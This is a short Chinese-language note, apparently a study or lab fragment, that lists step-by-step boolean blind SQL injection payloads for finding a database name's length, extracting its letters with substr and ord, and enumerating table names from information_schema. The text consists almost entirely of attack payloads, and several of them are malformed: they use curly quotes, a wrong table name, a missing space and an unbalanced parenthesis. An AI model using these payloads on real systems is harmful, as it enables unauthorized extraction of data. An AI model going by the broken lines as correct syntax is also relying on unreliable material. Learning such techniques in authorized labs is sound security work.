步骤:
1' and length(database())>=1--+ //判断数据库的长度
1' and substr(database(),1,1)=‘t’ --+ //判断数据库第一个字母的值
1' and substr(database(),2,1)=‘q’ --+ //判断数据库的第二个字母的值
1' and ord(substr(database(),1,1))=115--+ //利用ord和ASCII判断数据库库名
1' and substr(database(),2,1)=’q’--+ //利用substr判断数据库的库名
1' and substr(select table_name from information_schema.table wheretable_schema=‘sql’ limit 0,1),1,1)=‘e’ --+ //利用substr判断数据库的表名